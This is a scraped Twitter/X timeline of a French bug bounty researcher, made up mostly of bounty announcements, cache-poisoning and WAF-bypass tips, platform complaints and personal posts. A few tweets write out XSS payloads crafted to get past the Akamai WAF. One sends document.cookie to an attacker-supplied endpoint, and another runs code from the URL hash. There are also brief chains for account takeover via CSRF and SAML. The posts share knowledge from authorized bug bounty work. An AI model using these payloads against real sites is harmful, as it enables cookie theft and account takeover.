Rachid.A

@zhero___

3,361
Followers
443
Following
194
Media
1,503
Statuses

Vulnerability Researcher. Top 10 France @Hacker0x01 lb 2023 ; bounty/acc

France | 🇩🇿🇵🇸
Joined September 2019
Pinned Tweet
@zhero___
Rachid.A
2 months
happy to release my new article entitled: Next.js and cache poisoning: a quest for the black hole good reading;
Tweet media one
33
147
594
@zhero___
Rachid.A
1 year
Stored XSS via cache poisoning 🧪 the Akamai WAF really annoyed me, but the craft of this payload defeated it : "><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))"> #bugbountytips #BugBounty #Hacking
Tweet media one
22
185
630
@zhero___
Rachid.A
3 years
🔎 Why Muslim Network? 🚀 #Muslim #Islam
Tweet media one
9
586
432
@zhero___
Rachid.A
2 months
instead of heading towards what everyone else is looking for, explore a vulnerability that you like. Dive deep into the topic, invest, set up a small lab and look for specific cases or recurring vulnerabilities in any software. It might take a while, but your efforts will be worth it
Tweet media one
19
36
441
@zhero___
Rachid.A
5 months
research => interesting discovery => pattern recovery + template creation => axiom + nuclei => mass scan (BB programs) => double check and report. Ramadan mubaarak to all Muslims, take advantage of this month to get back to essential things! #BugBounty
Tweet media one
23
33
342
@zhero___
Rachid.A
1 month
going to the gym is good, but it doesn't help finding 0d (?)
Tweet media one
18
3
214
@zhero___
Rachid.A
7 months
1. Identify a URL param allowing a potential LFI. 2. FUZZ the param value (GPT can help to create a custom list). 3. Find a new file/page via LFI. 4. FUZZ looking for URL params reflected on this newly discovered file (...) ⬇️ #bugbountytips #Hacking
Tweet media one
9
30
202
@zhero___
Rachid.A
8 months
Maybe a write-up soon, it's been a while since I wrote stuff here: #bugbounty #Hacking
Tweet media one
5
30
192
@zhero___
Rachid.A
3 months
a few bounties on @intigriti to start the week off right ⚔️ wal hamduliLlah;
Tweet media one
11
1
179
@zhero___
Rachid.A
5 months
the cooking continues wal hamduliLlah, here are some of the dishes. The "bypass" used for the last report sent is very interesting, curious to see if other assets are impacted #BugBounty
Tweet media one
12
7
178
@zhero___
Rachid.A
3 months
nice bounty on @intigriti that secures the first place of the program a bit more;
Tweet media one
15
0
172
@zhero___
Rachid.A
26 days
good hit on @immunefi ;
Tweet media one
13
5
168
@zhero___
Rachid.A
7 months
1. Self-XSS on the personal information side. 2. Search for a CSRF on the vector in question, but nothing on the web app side. 3. Discovery of an old endpoint on the mobile app vulnerable to CSRF (...) ⬇️ #bugbountytip #BugBounty
Tweet media one
9
19
158
@zhero___
Rachid.A
3 months
someone is going to have a rough time
Tweet media one
9
3
148
@zhero___
Rachid.A
3 months
moved my writeups to a personal blog and took the opportunity to write a little on a discovery inspired by shubs' last talk on WAF bypasses. So, while waiting for the next articles on my recent 0d: WAF as a weapon and DOS as a bullet #infosecurity
Tweet media one
8
27
143
@zhero___
Rachid.A
4 months
Yay, I was awarded a $2,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder The BB is also that: sometimes we come across self-respecting companies that make sure to be fair, and it's frankly pleasant
Tweet media one
15
1
137
@zhero___
Rachid.A
1 year
The hunt was good tonight al hamduliLlah. If during a cache poisoning attempt the X-Http-Method-Override header is taken into account by the server (and the response cached), take the time to test all HTTP verbs, you might have some interesting behaviors #bugbountytips #BugBounty
Tweet media one
11
18
131
@zhero___
Rachid.A
11 months
Al hamduliLlah, two good notifications on @intigriti today; #bugbounty
Tweet media one
13
3
124
@zhero___
Rachid.A
5 months
Be careful when testing for cache poisoning: it is rare, but sometimes URL parameters are not included in the cache key. This means that even if you add a parameter to poison the cache, the param will not act as a cache buster (...) ⬇️ #bugbountytips
Tweet media one
4
17
128
@zhero___
Rachid.A
21 days
Complete POC for an RXSS to ATO. H1 triage: Medium
Tweet media one
6
8
128
@zhero___
Rachid.A
26 days
Yay, I was awarded a $1050 + $500 bounty on @Hacker0x01 ! Beyond exposing the amounts of these two not exceptional bounties, it has been two times in a row -diff programs- that I have almost seen my bounty halved. So "move on", yeah, but not too quickly either
Tweet media one
Tweet media two
7
4
125
@zhero___
Rachid.A
2 months
a bit too lazy to search right now, more focused on acquiring new knowledge. Fortunately, my little automation sends me some good news
Tweet media one
12
0
124
@zhero___
Rachid.A
3 months
It was my day off, but I couldn't resist checking something that was on my mind before going to sleep. Moral of the story: don't take days off (???)
Tweet media one
8
6
122
@zhero___
Rachid.A
1 year
The JavaScript code sometimes contains treasures, read it! Developers sometimes provide certain URL parameters during development that they abandon in production. When this is the case, it is rarely properly sanitized #BugBounty #bugbountytips
Tweet media one
11
7
118
@zhero___
Rachid.A
11 months
Received, thanks @Hacker0x01 ; Unlike H1 socks, I'm more likely to wear it ✌🏽 #BugBounty
Tweet media one
15
0
113
@zhero___
Rachid.A
1 year
The bypass of WAF - when it happens - is particularly satisfying 🥷🏽 To those concerned: Don't forget to fast 'ashura today ☝🏼 #BugBounty
Tweet media one
11
4
113
@zhero___
Rachid.A
3 months
two interesting finds to keep the momentum going, tonight's hunt went well
Tweet media one
10
2
114
@zhero___
Rachid.A
5 months
a first for me on @immunefi ! "Soon" an article on a little research that I did, allowing me to find more than 60 vulnerable assets (for the moment) #BugBounty #Hacking
Tweet media one
7
8
110
@zhero___
Rachid.A
1 year
Take a look at my new write-up: "DOS via cache poisoning" covering some of my findings. 🧪 I briefly explain how a cache works and how this vulnerability is possible, good reading! #bugbountytips #bugbountytip #bugbounty #infosec
4
38
104
@zhero___
Rachid.A
1 year
Yay, I was awarded a $2,500 bounty on @Hacker0x01 ! #TogetherWeHitHarder #hackerone #bugbounty ⚙️ Auth bypass due to misconfiguration 🎯 Access to all the monitoring panel of databases in production
5
5
101
@zhero___
Rachid.A
4 months
the company was a little slow but paid off in the end. First bounty on @immunefi
Tweet media one
14
2
105
@zhero___
Rachid.A
8 days
bug bounty mafia ep. 2342952: from a $2500 to a $750 bounty, and always the same fairy tales to justify themselves; beyond exposing my case and seeking justice by tagging the entire H1 team in my post, when can we expect a stricter system for companies? #BugBounty
Tweet media one
3
3
98
@zhero___
Rachid.A
1 year
Tweet media one
8
4
94
@zhero___
Rachid.A
2 months
worship your Lord, train yourself, and seek zero-days. Memento mori, my friends
Tweet media one
6
3
93
@zhero___
Rachid.A
1 year
It's a good Sunday, al hamdulillah. Maybe a write-up soon on my modest Medium account : () #BugBounty #hackerone
Tweet media one
5
8
85
@zhero___
Rachid.A
3 months
new 0d/misconfig unlocked <> a good way to start the week, isn't it
Tweet media one
6
0
88
@zhero___
Rachid.A
1 year
Start of the new season. Let's see what will be the fate of these reports ☝🏼 #hackerone #BugBounty
Tweet media one
4
3
84
@zhero___
Rachid.A
28 days
having tried new cooking options these last few days, the dish should be ready soon
Tweet media one
1
0
82
@zhero___
Rachid.A
24 days
we are a for-profit company that generates a lot of money and we invite you to our private VDP program so you can work for us for free, so, happy? (please say yes) I clearly indicated in my settings that I am not a volunteer, curious to know how they managed to get through
Tweet media one
5
4
79
@zhero___
Rachid.A
27 days
- why does this guy have insects on his water bottle? They don't know that I have 100% valid submissions on @intigriti
Tweet media one
8
0
75
@zhero___
Rachid.A
3 months
hey @jobertabma , @scarybeasts useful feature: be notified when the original report of a duplicate is resolved (or when adding/decreasing rep points indirectly). This isn't the first time that one of my dup reports is still valid after the original report has been resolved... ⬇️
Tweet media one
4
1
74
@zhero___
Rachid.A
15 days
I just found a bug and got paid on @immunefi
9
1
74
@zhero___
Rachid.A
3 months
wow look at the sky
Tweet media one
7
1
74
@zhero___
Rachid.A
5 months
we will increase the character's stats, God willing
Tweet media one
4
6
75
@zhero___
Rachid.A
1 year
First vulnerability report submitted on @intigriti platform, UI is quite nice 🧩 #BugBounty
Tweet media one
3
2
71
@zhero___
Rachid.A
6 months
small battles to bypass WAFs are always a pleasure. By the way, if someone needs help and wants to collaborate, Akam @i bypass (XSS) available #BugBounty #infosecurity
Tweet media one
4
4
68
@zhero___
Rachid.A
4 months
other sites are also vulnerable to the "bypass" in question. Nothing crazy about the vulnerability here, but very interesting behavior
Tweet media one
@zhero___
Rachid.A
5 months
the cooking continues wal hamduliLlah, here are some of the dishes. The "bypass" used for the last report sent is very interesting, curious to see if other assets are impacted #BugBounty
Tweet media one
12
7
178
5
5
68
@zhero___
Rachid.A
7 months
I have access to an AEM via path trans & after a long time digging, nothing juicy. The interesting endpoints require changing the HTTP verb, which is impossible for me -> path trans via serv-side param poll. An AEM expert to inspire me before I abandon this vector forever? #bugbounty
Tweet media one
4
0
67
@zhero___
Rachid.A
1 year
10.12.22 - Submission; 11.12.22 - Internal disc. with the sec team; 23.01.23 - Start of mediation; 20.02.23 - Needs more info (= vulnerability patched by the Alibaba team and therefore not reproducible); 15.08.23 - Resolved (without bounty of course) #BugBounty #hackerone #infosec
Tweet media one
11
6
62
@zhero___
Rachid.A
7 months
Some sites do not have the same ftrs/technos depending on the region chosen; this is often aimed at providing a more relevant UX adapted to the specific needs of each region. And it may be that a fix is deployed in some countries but not others: /fr/ fix, /sg/ still #bugbountytips
Tweet media one
1
8
60
@zhero___
Rachid.A
8 months
Yay, I was awarded a $750 bounty on @Hacker0x01 ! #TogetherWeHitHarder Complete streak! Don't we unlock an end boss?
Tweet media one
4
0
59
@zhero___
Rachid.A
1 year
For those who asked me how to make a payload - bypassing the Akamai WAF - for a blind XSS, or simply to retrieve cookies to its endpoint : "><input autofocus nope="%26quot;x%26quot;"onfocus="frames.location='YOUR_ENDPOINT?c='+Reflect.get(document,'coo'+'kie')"> #bugbountytips
0
16
60
@zhero___
Rachid.A
1 year
Context: XSS to account takeover. "For any reflected XSS, Confidentiality is always None" What do you think? Is he right? If yes, why? #bugbounty #infosec #hackerone
Tweet media one
9
7
59
@zhero___
Rachid.A
8 months
Lumberjack Payload 🪓 After a long battle (blacklisted keywords, prohibited parentheses, different types of simple apostrophes..) I got it. -> #javascript :whatever you want() in the URL hash -> frames["loca"+"tion"]=frames.location.hash[1]+.... #bugbountytips #BugBountytip ⬇️
Tweet media one
3
11
53
@zhero___
Rachid.A
1 year
Hi @Hacker0x01 , if a company decides to literally ghost a researcher and fix the bug a few months later, is that really possible? Customers are king, okay, but at this point? Not a single message from the security team in 6 months despite two mediations 🫠 #BugBounty #hackerone
Tweet media one
3
2
52
@zhero___
Rachid.A
2 months
I was able to exploit similar behavior via a GET req this time: the values of several URL params were returned by the server, then all put together in a cookie, by dividing a payload normally blocked by the WAF into 3 and placing each part as the value of a param (...) #bugbounty
Tweet media one
@zhero___
Rachid.A
3 months
moved my writeups to a personal blog and took the opportunity to write a little on a discovery inspired by shubs' last talk on WAF bypasses. So, while waiting for the next articles on my recent 0d: WAF as a weapon and DOS as a bullet #infosecurity
Tweet media one
8
27
143
6
2
53
@zhero___
Rachid.A
3 months
nothing crazy here, just a few low-hanging fruits. You can smell it too, right? That scent of duplicates
Tweet media one
3
1
52
@zhero___
Rachid.A
1 month
nice to see that my last research on next.js is mentioned in this episode of @ctbbpodcast with some takeaways regarding cache poisoning, take a look;
@ctbbpodcast
Critical Thinking - Bug Bounty Podcast
1 month
Latest episode is live and this week we've got a tool drop! @Rhynorater put together a script and Caido extension which coordinates with @DanielMiessler 's Fabric to help automate BBP report writing. Also, lots of reporting tips! Enjoy!
1
8
62
0
4
51
@zhero___
Rachid.A
12 days
stay healthy, be a natty guy
Tweet media one
4
2
50
@zhero___
Rachid.A
1 year
Tweet media one
1
3
48
@zhero___
Rachid.A
1 year
Thank you for the gifts @Hacker0x01. Currently at +780 rep points on #HackerOne having only worked on paid programs, free work for for-profit companies not being my thing. Nothing crazy, have to keep trying hard hoping that the continuity will be exponential -in shaa Allah-☝🏼
Tweet media one
5
1
47
@zhero___
Rachid.A
2 years
Let's not forget them in our supplications
0
8
37
@zhero___
Rachid.A
7 months
Yay, I was awarded a $450 bounty on @Hacker0x01 ! #TogetherWeHitHarder Ah, I understand better now, sorry for asking stupid questions
Tweet media one
2
0
48
@zhero___
Rachid.A
3 months
@bxmbn the colleague was developing his web project in the comments
Tweet media one
7
0
47
@zhero___
Rachid.A
1 year
If you manage to cache - via any extension - a 404 response (error being caused by the addition of your extension), make sure that no confidential information is present in the source code when you are connected to an account. 🧪 #bugbountytips #bugbountytip #infosec
Tweet media one
3
3
47
@zhero___
Rachid.A
2 months
cool, a new bounty, I forgot this report. Wait
Tweet media one
3
0
48
@zhero___
Rachid.A
7 months
Little #bugbountytip: HTMLi in an email template to ATO? When we have a code inj in an email template, we report it as HTMLi since it is not possible to execute JS in the different email clients. Sometimes a link is provided in the email to view it in the browser > JS triggering > XSS
Tweet media one
2
7
48
@zhero___
Rachid.A
2 months
hey @Ice3man543 , description/CVE is incorrect here: the vuln linked to the invoke header is not linked to CVE-2023-46298 [1], I did not get a CVE as explained in my research. If you create an exclusive template for the invoke header, remember to put my article [2] in the ref, thanks!
Tweet media one
3
1
47
@zhero___
Rachid.A
2 months
🇵🇸
3
1
45
@zhero___
Rachid.A
5 months
besides I'm quite surprised by the stats +3000 readers, glad it's useful!
Tweet media one
@zhero___
Rachid.A
5 months
it's okay not to master a subject, but in this case you have to ask and not act hastily. It's like saying about an RCE POC that the "id" command is not sensitive and that it is therefore not a vuln.. We have an adage which says: "science (knowledge) before words and actions!"
Tweet media one
1
0
17
2
1
45
@zhero___
Rachid.A
1 year
Same thing without user interaction : "><input autofocus nope="%26quot;x%26quot;"onfocus="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
1
8
44
@zhero___
Rachid.A
2 months
when I search for vulnerabilities via techniques and/or discoveries on a particular subject, my duplicate rate is 0%. The beaten path has its limits, the competition is tough, don't be a skid, easy money doesn't exist -almost-. Enjoy and be curious (sry for the linkedin aura)
1
1
45
@zhero___
Rachid.A
4 months
Yay, I was awarded for a valid submission on @HackenProof #hackenproofed #bugbounty
4
2
44
@zhero___
Rachid.A
11 months
Craft, XSS and ATO. After some research, I came across a POST request in my proxy which -for some reasons- caught my attention. The server was returning data in JSON format; I retrieved the parameters passed via POST, then transmitted them via a GET request (...) #bugbountytips
3
0
41
@zhero___
Rachid.A
5 months
- I want to pay my bill - it's $500 - hold - but... you have nothing in your hands sir - ah it’s normal don’t worry, it’s iNtErNeT pOiNtS - 😰
@SchizoDuckie
🦆 SchizoDuckie 🦆
5 months
Presented without further comment.
Tweet media one
Tweet media two
Tweet media three
10
3
90
7
0
42
@zhero___
Rachid.A
8 months
Improper config of SAML allows the use of the relayState param to redirect the user to an endpoint owned by the attckr. The redirect is done via a POST by which it returns the SAML resp after auth. The value of the SAML resp can then be exchanged for an access_token #bugbountytip ⬇️
Tweet media one
3
0
42
@zhero___
Rachid.A
7 months
🥷🏽 #bugbounty
Tweet media one
1
1
40
@zhero___
Rachid.A
4 months
a bounty + positive feedback is always nice, we're not going to lie on @intigriti ;
Tweet media one
4
0
40
@zhero___
Rachid.A
4 months
nice bypass, without parentheses or template strings, I had fun! If anyone needs help and wants to collaborate, Cloudfl @re bypass (XSS) available (Akam @i still available) #bugbounty #Hacking
Tweet media one
@zhero___
Rachid.A
6 months
small battles to bypass WAFs are always a pleasure. By the way, if someone needs help and wants to collaborate, Akam @i bypass (XSS) available #BugBounty #infosecurity
Tweet media one
4
4
68
3
1
40
@zhero___
Rachid.A
2 months
lately I've seen quite a few posts from hunters blocked by WAFs asking for help to transform their HTMLi into XSS. Guys, it's my guilty pleasure, don't hesitate, WAFs tend to let me pass. Always available for this kind of little #bugbounty collabs
Tweet media one
5
3
38
@zhero___
Rachid.A
2 months
Eid Mubarak, Eïd mubaarak
4
0
38